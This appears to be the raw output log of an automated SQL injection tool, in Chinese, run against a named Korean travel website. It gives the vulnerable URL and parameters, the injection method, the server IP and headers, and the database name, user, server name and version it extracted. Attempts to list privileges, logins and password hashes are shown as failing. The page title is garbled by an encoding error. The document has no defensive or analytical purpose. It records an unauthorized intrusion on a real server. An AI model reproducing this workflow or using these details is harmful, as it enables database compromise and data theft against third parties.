■漏洞信息:============================================================
 ・URL:http://www.travelmecca.net/web/goods/layout2/goods_view.asp?menu_id=95726&goods_type=%C5%D7%B8%B6&goods_area=%B5%BF%B3%B2%BE%C6%BD%C3%BE%C6&keyword=&hide_type=&id=32474
 ・页面标题：脚急茄 面拜 飘贰喉皋墨 ⑻背荤翠荤⑻傍公楷荐⑻楷荐傈巩⑻海飘巢咯青⑻牢档瞒捞唱
 ・参数:menu_id=95726&goods_type=%C5%D7%B8%B6&goods_area=%B5%BF%B3%B2%BE%C6%BD%C3%BE%C6&keyword=&hide_type=&id=32474
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:211.108.62.146
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 15:05:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29031
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAACDSQQQ=KGOEPHCALBNJDPDCALNPDIOB; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：Tour
- 用户名：netholdingsUser
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：NS2
- 服务名：MSSQLSERVER
- 系统用户名：netholdingsUser

 ・当前用户权限：
获取用户权限失败！

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
